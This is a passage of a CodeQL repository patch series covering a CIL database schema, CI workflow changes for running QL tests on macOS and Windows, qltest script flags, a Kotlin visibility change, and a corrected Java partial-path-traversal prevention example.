| + @cil_ldind | @cil_unbox; + +@cil_conversion_operation = + @cil_conv_i1 | @cil_conv_i2 | @cil_conv_i4 | @cil_conv_i8 | + @cil_conv_u1 | @cil_conv_u2 | @cil_conv_u4 | @cil_conv_u8 | + @cil_conv_ovf_i | @cil_conv_ovf_i_un | @cil_conv_ovf_i1 | @cil_conv_ovf_i1_un | + @cil_conv_ovf_i2 | @cil_conv_ovf_i2_un | @cil_conv_ovf_i4 | @cil_conv_ovf_i4_un | + @cil_conv_ovf_i8 | @cil_conv_ovf_i8_un | @cil_conv_ovf_u | @cil_conv_ovf_u_un | + @cil_conv_ovf_u1 | @cil_conv_ovf_u1_un | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_ovf_u4 | @cil_conv_ovf_u4_un | @cil_conv_ovf_u8 | @cil_conv_ovf_u8_un | + @cil_conv_r4 | @cil_conv_r8 | @cil_conv_ovf_u2 | @cil_conv_ovf_u2_un | + @cil_conv_i | @cil_conv_u | @cil_conv_r_un; + +@cil_ldind = @cil_ldind_i | @cil_ldind_i1 | @cil_ldind_i2 | @cil_ldind_i4 | @cil_ldind_i8 | + @cil_ldind_r4 | @cil_ldind_r8 | @cil_ldind_ref | @cil_ldind_u1 | @cil_ldind_u2 | @cil_ldind_u4; + +@cil_stind = @cil_stind_i | @cil_stind_i1 | @cil_stind_i2 | @cil_stind_i4 | @cil_stind_i8 | + @cil_stind_r4 | @cil_stind_r8 | @cil_stind_ref; + +@cil_bitwise_operation = @cil_binary_bitwise_operation | @cil_unary_bitwise_operation; + +@cil_binary_bitwise_operation = @cil_and | @cil_or | @cil_xor | @cil_shr | @cil_shr | @cil_shr_un | @cil_shl; + +@cil_binary_arithmetic_operation = @cil_add | @cil_sub | @cil_mul | @cil_div | @cil_div_un | + @cil_rem | @cil_rem_un | @cil_add_ovf | @cil_add_ovf_un | @cil_mul_ovf | @cil_mul_ovf_un | + @cil_sub_ovf | @cil_sub_ovf_un; + +@cil_unary_bitwise_operation = @cil_not; + +@cil_binary_expr = @cil_binary_arithmetic_operation | @cil_binary_bitwise_operation | @cil_read_array | @cil_comparison_operation; + +@cil_unary_arithmetic_operation = @cil_neg; + +@cil_comparison_operation = @cil_cgt_un | @cil_ceq | @cil_cgt | @cil_clt | @cil_clt_un; + +// Elements that retrieve an address of something +@cil_read_ref = @cil_ldloca_s | @cil_ldarga_s | @cil_ldflda | @cil_ldsflda | @cil_ldelema; + +// CIL array instructions + +@cil_read_array = + @cil_ldelem | @cil_ldelema | @cil_ldelem_i1 | @cil_ldelem_ref | @cil_ldelem_i | + @cil_ldelem_i1 | @cil_ldelem_i2 | @cil_ldelem_i4 | @cil_ldelem_i8 | @cil_ldelem_r4 | + @cil_ldelem_r8 | @cil_ldelem_u1 | @cil_ldelem_u2 | @cil_ldelem_u4; + +@cil_write_array = @cil_stelem | @cil_stelem_ref | + @cil_stelem_i | @cil_stelem_i1 | @cil_stelem_i2 | @cil_stelem_i4 | @cil_stelem_i8 | + @cil_stelem_r4 | @cil_stelem_r8; + +@cil_throw_any = @cil_throw | @cil_rethrow; + +#keyset[impl, index] +cil_instruction( + unique int id: @cil_instruction, + int opcode: int ref, + int index: int ref, + int impl: @cil_method_implementation ref); + +cil_jump( + unique int instruction: @cil_jump ref, + int target: @cil_instruction ref); + +cil_access( + unique int instruction: @cil_instruction ref, + int target: @cil_accessible ref); + +cil_value( + unique int instruction: @cil_literal ref, + string value: string ref); + +#keyset[instruction, index] +cil_switch( + int instruction: @cil_switch ref, + int index: int ref, + int target: @cil_instruction ref); + +cil_instruction_location( + unique int id: @cil_instruction ref, + int loc: @location ref); + +cil_type_location( + int id: @cil_type ref, + int loc: @location ref); + +cil_method_location( + int id: @cil_method ref, + int loc: @location ref); + +@cil_namespace = @namespace; + +@cil_type_container = @cil_type | @cil_namespace | @cil_method; + +case @cil_type.kind of + 0 = @cil_valueorreftype +| 1 = @cil_typeparameter +| 2 = @cil_array_type +| 3 = @cil_pointer_type +| 4 = @cil_function_pointer_type +; + +cil_type( + unique int id: @cil_type, + string name: string ref, + int kind: int ref, + int parent: @cil_type_container ref, + int sourceDecl: @cil_type ref); + +cil_pointer_type( + unique int id: @cil_pointer_type ref, + int pointee: @cil_type ref); + +cil_array_type( + unique int id: @cil_array_type ref, + int element_type: @cil_type ref, + int rank: int ref); + +cil_function_pointer_return_type( + unique int id: @cil_function_pointer_type ref, + int return_type: @cil_type ref); + +cil_method( + unique int id: @cil_method, + string name: string ref, + int parent: @cil_type ref, + int return_type: @cil_type ref); + +cil_method_source_declaration( + unique int method: @cil_method ref, + int source: @cil_method ref); + +cil_method_implementation( + unique int id: @cil_method_implementation, + int method: @cil_method ref, + int location: @assembly ref); + +cil_implements( + int id: @cil_method ref, + int decl: @cil_method ref); + +#keyset[parent, name] +cil_field( + unique int id: @cil_field, + int parent: @cil_type ref, + string name: string ref, + int field_type: @cil_type ref); + +@cil_element = @cil_instruction | @cil_declaration | @cil_handler | @cil_attribute | @cil_namespace; +@cil_named_element = @cil_declaration | @cil_namespace; +@cil_declaration = @cil_variable | @cil_method | @cil_type | @cil_member; +@cil_accessible = @cil_declaration; +@cil_variable = @cil_field | @cil_stack_variable; +@cil_stack_variable = @cil_local_variable | @cil_parameter; +@cil_member = @cil_method | @cil_type | @cil_field | @cil_property | @cil_event; +@cil_custom_modifier_receiver = @cil_method | @cil_property | @cil_parameter | @cil_field | @cil_function_pointer_type; +@cil_parameterizable = @cil_method | @cil_function_pointer_type; +@cil_has_type_annotation = @cil_stack_variable | @cil_property | @cil_method | @cil_function_pointer_type; + +#keyset[parameterizable, index] +cil_parameter( + unique int id: @cil_parameter, + int parameterizable: @cil_parameterizable ref, + int index: int ref, + int param_type: @cil_type ref); + +cil_parameter_in(unique int id: @cil_parameter ref); +cil_parameter_out(unique int id: @cil_parameter ref); + +cil_setter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +#keyset[id, modifier] +cil_custom_modifiers( + int id: @cil_custom_modifier_receiver ref, + int modifier: @cil_type ref, + int kind: int ref); // modreq: 1, modopt: 0 + +cil_type_annotation( + int id: @cil_has_type_annotation ref, + int annotation: int ref); + +cil_getter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +cil_adder(unique int event: @cil_event ref, + int method: @cil_method ref); + +cil_remover(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_raiser(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_property( + unique int id: @cil_property, + int parent: @cil_type ref, + string name: string ref, + int property_type: @cil_type ref); + +#keyset[parent, name] +cil_event(unique int id: @cil_event, + int parent: @cil_type ref, + string name: string ref, + int event_type: @cil_type ref); + +#keyset[impl, index] +cil_local_variable( + unique int id: @cil_local_variable, + int impl: @cil_method_implementation ref, + int index: int ref, + int var_type: @cil_type ref); + +cil_function_pointer_calling_conventions( + int id: @cil_function_pointer_type ref, + int kind: int ref); + +// CIL handlers (exception handlers etc). + +case @cil_handler.kind of + 0 = @cil_catch_handler +| 1 = @cil_filter_handler +| 2 = @cil_finally_handler +| 4 = @cil_fault_handler +; + +#keyset[impl, index] +cil_handler( + unique int id: @cil_handler, + int impl: @cil_method_implementation ref, + int index: int ref, + int kind: int ref, + int try_start: @cil_instruction ref, + int try_end: @cil_instruction ref, + int handler_start: @cil_instruction ref); + +cil_handler_filter( + unique int id: @cil_handler ref, + int filter_start: @cil_instruction ref); + +cil_handler_type( + unique int id: @cil_handler ref, + int catch_type: @cil_type ref); + +@cil_controlflow_node = @cil_entry_point | @cil_instruction; + +@cil_entry_point = @cil_method_implementation | @cil_handler; + +@cil_dataflow_node = @cil_instruction | @cil_variable | @cil_method; + +cil_method_stack_size( + unique int method: @cil_method_implementation ref, + int size: int ref); + +// CIL modifiers + +cil_public(int id: @cil_member ref); +cil_private(int id: @cil_member ref); +cil_protected(int id: @cil_member ref); +cil_internal(int id: @cil_member ref); +cil_static(int id: @cil_member ref); +cil_sealed(int id: @cil_member ref); +cil_virtual(int id: @cil_method ref); +cil_abstract(int id: @cil_member ref); +cil_class(int id: @cil_type ref); +cil_interface(int id: @cil_type ref); +cil_security(int id: @cil_member ref); +cil_requiresecobject(int id: @cil_method ref); +cil_specialname(int id: @cil_method ref); +cil_newslot(int id: @cil_method ref); + +cil_base_class(unique int id: @cil_type ref, int base: @cil_type ref); +cil_base_interface(int id: @cil_type ref, int base: @cil_type ref); +cil_enum_underlying_type(unique int id: @cil_type ref, int underlying: @cil_type ref); + +#keyset[unbound, index] +cil_type_parameter( + int unbound: @cil_member ref, + int index: int ref, + int param: @cil_typeparameter ref); + +#keyset[bound, index] +cil_type_argument( + int bound: @cil_member ref, + int index: int ref, + int t: @cil_type ref); + +// CIL type parameter constraints + +cil_typeparam_covariant(int tp: @cil_typeparameter ref); +cil_typeparam_contravariant(int tp: @cil_typeparameter ref); +cil_typeparam_class(int tp: @cil_typeparameter ref); +cil_typeparam_struct(int tp: @cil_typeparameter ref); +cil_typeparam_new(int tp: @cil_typeparameter ref); +cil_typeparam_constraint(int tp: @cil_typeparameter ref, int supertype: @cil_type ref); + +// CIL attributes + +cil_attribute( + unique int attributeid: @cil_attribute, + int element: @cil_declaration ref, + int constructor: @cil_method ref); + +#keyset[attribute_id, param] +cil_attribute_named_argument( + int attribute_id: @cil_attribute ref, + string param: string ref, + string value: string ref); + +#keyset[attribute_id, index] +cil_attribute_positional_argument( + int attribute_id: @cil_attribute ref, + int index: int ref, + string value: string ref); + + +// Common .Net data model covering both C# and CIL + +// Common elements +@dotnet_element = @element | @cil_element; +@dotnet_named_element = @named_element | @cil_named_element; +@dotnet_callable = @callable | @cil_method; +@dotnet_variable = @variable | @cil_variable; +@dotnet_field = @field | @cil_field; +@dotnet_parameter = @parameter | @cil_parameter; +@dotnet_declaration = @declaration | @cil_declaration; +@dotnet_member = @member | @cil_member; +@dotnet_event = @event | @cil_event; +@dotnet_property = @property | @cil_property | @indexer; +@dotnet_parameterizable = @parameterizable | @cil_parameterizable; + +// Common types +@dotnet_type = @type | @cil_type; +@dotnet_call = @call | @cil_call_any; +@dotnet_throw = @throw_element | @cil_throw_any; +@dotnet_valueorreftype = @cil_valueorreftype | @value_or_ref_type | @cil_array_type | @void_type; +@dotnet_typeparameter = @type_parameter | @cil_typeparameter; +@dotnet_array_type = @array_type | @cil_array_type; +@dotnet_pointer_type = @pointer_type | @cil_pointer_type; +@dotnet_type_parameter = @type_parameter | @cil_typeparameter; +@dotnet_generic = @dotnet_valueorreftype | @dotnet_callable; + +// Attributes +@dotnet_attribute = @attribute | @cil_attribute; + +// Expressions +@dotnet_expr = @expr | @cil_expr; + +// Literals +@dotnet_literal = @literal_expr | @cil_literal; +@dotnet_string_literal = @string_literal_expr | @cil_ldstr; +@dotnet_int_literal = @integer_literal_expr | @cil_ldc_i; +@dotnet_float_literal = @float_literal_expr | @cil_ldc_r; +@dotnet_null_literal = @null_literal_expr | @cil_ldnull; + +@metadata_entity = @cil_method | @cil_type | @cil_field | @cil_property | @field | @property | + @callable | @value_or_ref_type | @void_type; + +#keyset[entity, location] +metadata_handle(int entity : @metadata_entity ref, int location: @assembly ref, int handle: int ref) diff --git a/csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/upgrade.properties b/csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/upgrade.properties new file mode 100644 index 00000000000..5c0903d7ead --- /dev/null +++ b/csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/upgrade.properties @@ -0,0 +1,2 @@ +description: Add operators to the virtualizable type. +compatibility: full \ No newline at end of file From 8981d4c06bab87dfc82a0f9759796574315b8153 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 16 Jan 2023 13:43:26 +0100 Subject: [PATCH 291/381] C#: Add change note. --- .../lib/change-notes/2023-01-16-virtualizable-operators.md | 5 +++++ 1 file changed, 5 insertions(+) create mode 100644 csharp/ql/lib/change-notes/2023-01-16-virtualizable-operators.md diff --git a/csharp/ql/lib/change-notes/2023-01-16-virtualizable-operators.md b/csharp/ql/lib/change-notes/2023-01-16-virtualizable-operators.md new file mode 100644 index 00000000000..25aae2aa2b3 --- /dev/null +++ b/csharp/ql/lib/change-notes/2023-01-16-virtualizable-operators.md @@ -0,0 +1,5 @@ +--- +category: minorAnalysis +--- +* Support for `static virtual` and `static abstract` interface members. +* Support for *operators* in interface definitions. \ No newline at end of file From 0017461e2dd52e6767897a1a0726a7acdb2d7666 Mon Sep 17 00:00:00 2001 From: Tony Torralba Date: Mon, 16 Jan 2023 15:35:58 +0100 Subject: [PATCH 292/381] Update swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql Co-authored-by: Ben Ahmady <32935794+subatoi@users.noreply.github.com> --- swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql index ecff134f0bd..df5c128685f 100644 --- a/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql +++ b/swift/ql/src/queries/Security/CWE-312/CleartextLogging.ql @@ -1,5 +1,5 @@ /** - * @name Clear-text logging of sensitive information + * @name Cleartext logging of sensitive information * @description Logging sensitive information in plaintext can * expose it to an attacker. * @kind path-problem From 1d62751e159d1fa2dcd4a0de6f177a9f8a6fbecf Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Fri, 13 Jan 2023 13:40:24 +0100 Subject: [PATCH 293/381] test QL-for-QL on mac/win --- .github/workflows/ql-for-ql-tests.yml | 40 ++++++++++++++++++++++++++- ql/rust-toolchain.toml | 7 +++++ 2 files changed, 46 insertions(+), 1 deletion(-) create mode 100644 ql/rust-toolchain.toml diff --git a/.github/workflows/ql-for-ql-tests.yml b/.github/workflows/ql-for-ql-tests.yml index 1663c5d2fd8..ff894bcc6a9 100644 --- a/.github/workflows/ql-for-ql-tests.yml +++ b/.github/workflows/ql-for-ql-tests.yml @@ -33,7 +33,7 @@ jobs: ~/.cargo/registry ~/.cargo/git ql/target - key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-qltest-cargo-${{ hashFiles('ql/**/Cargo.lock') }} + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-qltest-cargo-${{ hashFiles('ql/rust-toolchain.toml', 'ql/**/Cargo.lock') }} - name: Build extractor run: | cd ql; @@ -49,3 +49,41 @@ jobs: find ql/ql/src "(" -name "*.ql" -or -name "*.qll" ")" -print0 | xargs -0 "${CODEQL}" query format --check-only env: CODEQL: ${{ steps.find-codeql.outputs.codeql-path }} + + other-os: + strategy: + matrix: + os: [macos-latest, windows-latest] + needs: [qltest] + runs-on: ${{ matrix.os }} + steps: + - uses: actions/checkout@v3 + - name: Install GNU tar + if: runner.os == 'macOS' + run: | + brew install gnu-tar + echo "/usr/local/opt/gnu-tar/libexec/gnubin" >> $GITHUB_PATH + - name: Find codeql + id: find-codeql + uses: github/codeql-action/init@77a8d2d10c0b403a8b4aadbd223dc489ecd22683 + with: + languages: javascript # does not matter + - uses: ./.github/actions/os-version + id: os_version + - uses: actions/cache@v3 + with: + path: | + ~/.cargo/registry + ~/.cargo/git + ql/target + key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-qltest-cargo-${{ hashFiles('ql/rust-toolchain.toml', 'ql/**/Cargo.lock') }} + - name: Build extractor + run: | + cd ql; + codeqlpath=$(dirname ${{ steps.find-codeql.outputs.codeql-path }}); + env "PATH=$PATH:$codeqlpath" ./scripts/create-extractor-pack.sh + - name: Run a single QL tests + run: | + "${CODEQL}" test run --check-databases --search-path "${{ github.workspace }}/ql/extractor-pack" ql/ql/test/queries/style/DeadCode/DeadCode.qlref + env: + CODEQL: ${{ steps.find-codeql.outputs.codeql-path }} \ No newline at end of file diff --git a/ql/rust-toolchain.toml b/ql/rust-toolchain.toml new file mode 100644 index 00000000000..c0ca7a2593a --- /dev/null +++ b/ql/rust-toolchain.toml @@ -0,0 +1,7 @@ +# This file specifies the Rust version used to develop and test the QL +# extractor. It is set to the lowest version of Rust we want to support. + +[toolchain] +channel = "1.54" +profile = "minimal" +components = [ "rustfmt" ] From 0685732e3f8c4cf98a65176b13adbb8ef1bfbaa2 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Fri, 13 Jan 2023 13:51:22 +0100 Subject: [PATCH 294/381] delete ql/ specific format step now that we have an all-languages format check --- .github/workflows/ql-for-ql-tests.yml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/.github/workflows/ql-for-ql-tests.yml b/.github/workflows/ql-for-ql-tests.yml index ff894bcc6a9..93bac75c3ad 100644 --- a/.github/workflows/ql-for-ql-tests.yml +++ b/.github/workflows/ql-for-ql-tests.yml @@ -44,11 +44,6 @@ jobs: "${CODEQL}" test run --check-databases --check-unused-labels --check-repeated-labels --check-redefined-labels --check-use-before-definition --search-path "${{ github.workspace }}/ql/extractor-pack" --consistency-queries ql/ql/consistency-queries ql/ql/test env: CODEQL: ${{ steps.find-codeql.outputs.codeql-path }} - - name: Check QL formatting - run: | - find ql/ql/src "(" -name "*.ql" -or -name "*.qll" ")" -print0 | xargs -0 "${CODEQL}" query format --check-only - env: - CODEQL: ${{ steps.find-codeql.outputs.codeql-path }} other-os: strategy: From 1de65131fe33b4d3d1a11a785c1c0e6a6b6bbbff Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Fri, 13 Jan 2023 13:52:35 +0100 Subject: [PATCH 295/381] add compilation cache to QL-for-QL tests --- .github/workflows/ql-for-ql-tests.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/.github/workflows/ql-for-ql-tests.yml b/.github/workflows/ql-for-ql-tests.yml index 93bac75c3ad..d4a1baa9bf8 100644 --- a/.github/workflows/ql-for-ql-tests.yml +++ b/.github/workflows/ql-for-ql-tests.yml @@ -39,9 +39,14 @@ jobs: cd ql; codeqlpath=$(dirname ${{ steps.find-codeql.outputs.codeql-path }}); env "PATH=$PATH:$codeqlpath" ./scripts/create-extractor-pack.sh + - name: Cache compilation cache + id: query-cache + uses: ./.github/actions/cache-query-compilation + with: + key: ql-for-ql-tests - name: Run QL tests run: | - "${CODEQL}" test run --check-databases --check-unused-labels --check-repeated-labels --check-redefined-labels --check-use-before-definition --search-path "${{ github.workspace }}/ql/extractor-pack" --consistency-queries ql/ql/consistency-queries ql/ql/test + "${CODEQL}" test run --check-databases --check-unused-labels --check-repeated-labels --check-redefined-labels --check-use-before-definition --search-path "${{ github.workspace }}/ql/extractor-pack" --consistency-queries ql/ql/consistency-queries --compilation-cache "${{ steps.query-cache.outputs.cache-dir }}" ql/ql/test env: CODEQL: ${{ steps.find-codeql.outputs.codeql-path }} From 2c1ecb507d429207bd4a5f6e666e12726ae54112 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Fri, 13 Jan 2023 13:59:09 +0100 Subject: [PATCH 296/381] fix windows --- .github/workflows/ql-for-ql-tests.yml | 20 ++++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/.github/workflows/ql-for-ql-tests.yml b/.github/workflows/ql-for-ql-tests.yml index d4a1baa9bf8..d0196bcc961 100644 --- a/.github/workflows/ql-for-ql-tests.yml +++ b/.github/workflows/ql-for-ql-tests.yml @@ -78,12 +78,28 @@ jobs: ql/target key: ${{ runner.os }}-${{ steps.os_version.outputs.version }}-qltest-cargo-${{ hashFiles('ql/rust-toolchain.toml', 'ql/**/Cargo.lock') }} - name: Build extractor + if: runner.os != 'Windows' run: | cd ql; codeqlpath=$(dirname ${{ steps.find-codeql.outputs.codeql-path }}); env "PATH=$PATH:$codeqlpath" ./scripts/create-extractor-pack.sh - - name: Run a single QL tests + - name: Build extractor (Windows) + if: runner.os == 'Windows' + shell: pwsh + run: | + cd ql; + $Env:PATH += ";$(dirname ${{ steps.find-codeql.outputs.codeql-path }})" + pwsh ./scripts/create-extractor-pack.ps1 + - name: Run a single QL tests - Unix + if: runner.os != 'Windows' run: | "${CODEQL}" test run --check-databases --search-path "${{ github.workspace }}/ql/extractor-pack" ql/ql/test/queries/style/DeadCode/DeadCode.qlref env: - CODEQL: ${{ steps.find-codeql.outputs.codeql-path }} \ No newline at end of file + CODEQL: ${{ steps.find-codeql.outputs.codeql-path }} + - name: Run a single QL tests - Windows + if: runner.os == 'Windows' + shell: pwsh + run: | + $Env:PATH += ";$(dirname ${{ steps.find-codeql.outputs.codeql-path }})" + codeql test run --check-databases --search-path "${{ github.workspace }}/ql/extractor-pack" ql/ql/test/queries/style/DeadCode/DeadCode.qlref + \ No newline at end of file From 587adea80901a9b6f62e8b94b0e56cd44c0491f9 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Sun, 15 Jan 2023 15:15:23 +0100 Subject: [PATCH 297/381] QL: add --working-dir to qltest.cmd to fix qltest --- ql/tools/qltest.cmd | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/tools/qltest.cmd b/ql/tools/qltest.cmd index 2573d4f929e..15b42c8af35 100644 --- a/ql/tools/qltest.cmd +++ b/ql/tools/qltest.cmd @@ -8,6 +8,7 @@ type NUL && "%CODEQL_DIST%\codeql.exe" database index-files ^ --include-extension=.yml ^ --size-limit=5m ^ --language=ql ^ + --working-dir=. ^ "%CODEQL_EXTRACTOR_QL_WIP_DATABASE%" exit /b %ERRORLEVEL% From 9e153cfb0d710ae83ff9fa03389e794cc91775db Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 16 Jan 2023 14:36:57 +0100 Subject: [PATCH 298/381] change the Ruby-build test such that Windows fails --- .github/workflows/ruby-build.yml | 22 +++------------------- 1 file changed, 3 insertions(+), 19 deletions(-) diff --git a/.github/workflows/ruby-build.yml b/.github/workflows/ruby-build.yml index e371ffcae27..bdb09bc9c7e 100644 --- a/.github/workflows/ruby-build.yml +++ b/.github/workflows/ruby-build.yml @@ -205,11 +205,6 @@ jobs: - name: Fetch CodeQL uses: ./.github/actions/fetch-codeql - - uses: actions/checkout@v3 - with: - repository: Shopify/example-ruby-app - ref: 67a0decc5eb550f3a9228eda53925c3afd40dfe9 - - name: Download Ruby bundle uses: actions/download-artifact@v3 with: @@ -218,26 +213,15 @@ jobs: - name: Unzip Ruby bundle shell: bash run: unzip -q -d "${{ runner.temp }}/ruby-bundle" "${{ runner.temp }}/codeql-ruby-bundle.zip" - - name: Prepare test files - shell: bash - run: | - echo "import codeql.ruby.AST select count(File f)" > "test.ql" - echo "| 4 |" > "test.expected" - echo 'name: sample-tests - version: 0.0.0 - dependencies: - codeql/ruby-all: "*" - extractor: ruby - tests: . - ' > qlpack.yml + - name: Run QL test shell: bash run: | - codeql test run --search-path "${{ runner.temp }}/ruby-bundle" --additional-packs "${{ runner.temp }}/ruby-bundle" . + codeql test run --search-path "${{ runner.temp }}/ruby-bundle" --additional-packs "${{ runner.temp }}/ruby-bundle" ruby/ql/test/library-tests/ast/constants/ - name: Create database shell: bash run: | - codeql database create --search-path "${{ runner.temp }}/ruby-bundle" --language ruby --source-root . ../database + codeql database create --search-path "${{ runner.temp }}/ruby-bundle" --language ruby --source-root ruby/ql/test/library-tests/ast/constants/ ../database - name: Analyze database shell: bash run: | From 713599963be58ba8be517c434af44d1aa350e8ff Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 16 Jan 2023 14:47:49 +0100 Subject: [PATCH 299/381] add --working-dir to Ruby qltest.cmd to fix Windows --- ruby/tools/qltest.cmd | 1 + 1 file changed, 1 insertion(+) diff --git a/ruby/tools/qltest.cmd b/ruby/tools/qltest.cmd index e43fe47e3fa..00a223cae5c 100644 --- a/ruby/tools/qltest.cmd +++ b/ruby/tools/qltest.cmd @@ -8,6 +8,7 @@ type NUL && "%CODEQL_DIST%\codeql.exe" database index-files ^ --include=**/Gemfile ^ --size-limit=5m ^ --language=ruby ^ + --working-dir=. ^ "%CODEQL_EXTRACTOR_RUBY_WIP_DATABASE%" exit /b %ERRORLEVEL% From 17de5c120a173275e64734f558ea4c6356324840 Mon Sep 17 00:00:00 2001 From: Ian Lynagh Date: Mon, 16 Jan 2023 15:29:14 +0000 Subject: [PATCH 300/381] Kotlin: Make a couple of functions private --- java/kotlin-extractor/src/main/kotlin/utils/GetByFqName.kt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/java/kotlin-extractor/src/main/kotlin/utils/GetByFqName.kt b/java/kotlin-extractor/src/main/kotlin/utils/GetByFqName.kt index 0d1b63bf0f2..57815fc4409 100644 --- a/java/kotlin-extractor/src/main/kotlin/utils/GetByFqName.kt +++ b/java/kotlin-extractor/src/main/kotlin/utils/GetByFqName.kt @@ -18,7 +18,7 @@ fun getFunctionsByFqName(pluginContext: IrPluginContext, fqName: String): Collec return getFunctionsByFqName(pluginContext, FqName(fqName)) } -fun getFunctionsByFqName(pluginContext: IrPluginContext, fqName: FqName): Collection { +private fun getFunctionsByFqName(pluginContext: IrPluginContext, fqName: FqName): Collection { @OptIn(FirIncompatiblePluginAPI::class) return pluginContext.referenceFunctions(fqName) } @@ -27,7 +27,7 @@ fun getPropertiesByFqName(pluginContext: IrPluginContext, fqName: String): Colle return getPropertiesByFqName(pluginContext, FqName(fqName)) } -fun getPropertiesByFqName(pluginContext: IrPluginContext, fqName: FqName): Collection { +private fun getPropertiesByFqName(pluginContext: IrPluginContext, fqName: FqName): Collection { @OptIn(FirIncompatiblePluginAPI::class) return pluginContext.referenceProperties(fqName) } From dcc1c3d487b3b5838166b73a1c47bc536788efa2 Mon Sep 17 00:00:00 2001 From: erik-krogh Date: Mon, 16 Jan 2023 16:09:48 +0100 Subject: [PATCH 301/381] add --working-dir=. to pre-finalize for c# --- csharp/tools/pre-finalize.cmd | 1 + csharp/tools/pre-finalize.sh | 1 + 2 files changed, 2 insertions(+) diff --git a/csharp/tools/pre-finalize.cmd b/csharp/tools/pre-finalize.cmd index 0261f4ef437..0ee982b6585 100644 --- a/csharp/tools/pre-finalize.cmd +++ b/csharp/tools/pre-finalize.cmd @@ -7,6 +7,7 @@ type NUL && "%CODEQL_DIST%\codeql" database index-files ^ --include-extension=.xml ^ --size-limit 10m ^ --language xml ^ + --working-dir=. ^ -- ^ "%CODEQL_EXTRACTOR_CSHARP_WIP_DATABASE%" ^ >nul 2>&1 diff --git a/csharp/tools/pre-finalize.sh b/csharp/tools/pre-finalize.sh index 042ba044fb6..b0abd28f9ee 100755 --- a/csharp/tools/pre-finalize.sh +++ b/csharp/tools/pre-finalize.sh @@ -9,6 +9,7 @@ set -eu --include-extension=.xml \ --size-limit 10m \ --language xml \ + --working-dir=. \ -- \ "$CODEQL_EXTRACTOR_CSHARP_WIP_DATABASE" \ > /dev/null 2>&1 From 660e6d70855fcdb62172e3d784cb7047bd07c0f3 Mon Sep 17 00:00:00 2001 From: Antoine Taillefer Date: Mon, 16 Jan 2023 21:07:26 +0100 Subject: [PATCH 302/381] Fix partial path traversal Java example The Java recommendation example for the "Partial path traversal vulnerability from remote" query doesn't seem right to me. Indeed, the following statement doesn't compile, since `dir.getCanonicalPath()` returns a String: ``` dir.getCanonicalPath().toPath() ``` Maybe the author wanted to state `dir.getCanonicalFile().toPath()`, which would compile, but is useless compared to `dir.getCanonicalPath()`. Moreover, `parent.getCanonicalFile().toPath()` or `parent.getCanonicalPath()` will **not** be slash-terminated, contrary to what the description says. From what I can see (and test), the correct fix is to concatenate `File.separator` to the parent canonical path. --- java/ql/src/Security/CWE/CWE-023/PartialPathTraversalGood.java | 2 +- .../CWE/CWE-023/PartialPathTraversalRemainder.inc.qhelp | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/java/ql/src/Security/CWE/CWE-023/PartialPathTraversalGood.java b/java/ql/src/Security/CWE/CWE-023/PartialPathTraversalGood.java index a36a7dccb8a..baf4ef8545e 100644 --- a/java/ql/src/Security/CWE/CWE-023/PartialPathTraversalGood.java +++ b/java/ql/src/Security/CWE/CWE-023/PartialPathTraversalGood.java @@ -1,6 +1,6 @@ public class PartialPathTraversalGood { public void example(File dir, File parent) throws IOException { - if (!dir.getCanonicalPath().toPath().startsWith(parent.getCanonicalPath().toPath())) { + if (!dir.getCanonicalPath().startsWith(parent.getCanonicalPath() + File.separator)) { throw new IOException("Invalid directory: " + dir.getCanonicalPath()); } } diff --git a/java/ql/src/Security/CWE/CWE-023/PartialPathTraversalRemainder.inc.qhelp b/java/ql/src/Security/CWE/CWE-023/PartialPathTraversalRemainder.inc.qhelp index a20663dd162..7703f5c52ff 100644 --- a/java/ql/src/Security/CWE/CWE-023/PartialPathTraversalRemainder.inc.qhelp +++ b/java/ql/src/Security/CWE/CWE-023/PartialPathTraversalRemainder.inc.qhelp @@ -27,7 +27,7 @@ and not just children of parent, which is a security issue.

    In this example, the if statement checks if parent.getCanonicalPath() + File.separator -is a prefix of dir.getCanonicalPath(). Because parent.getCanonicalPath().toPath() is +is a prefix of dir.getCanonicalPath(). Because parent.getCanonicalPath() + File.separator is indeed slash-terminated, the user supplying dir can only access children of parent, as desired. From 63b4e5ef5c73d456a4c100c2d3337b297b297376 Mon Sep 17 00:00:00 2001 From: Alex Denisov Date: Tue, 17 Jan 2023 09:26:31 +0100 Subject: [PATCH 303/381] Swift: do not trace lsregister --- swift/tools/tracing-config.lua | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/swift/tools/tracing-config.lua b/swift/tools/tracing-config.lua index e73316aafa0..f5e58fb616c 100644 --- a/swift/tools/tracing-config.lua +++ b/swift/tools/tracing-config.lua @@ -78,7 +78,11 @@ function RegisterExtractorPack(id) invocation = {path = swiftExtractor, arguments = compilerArguments} } end - return 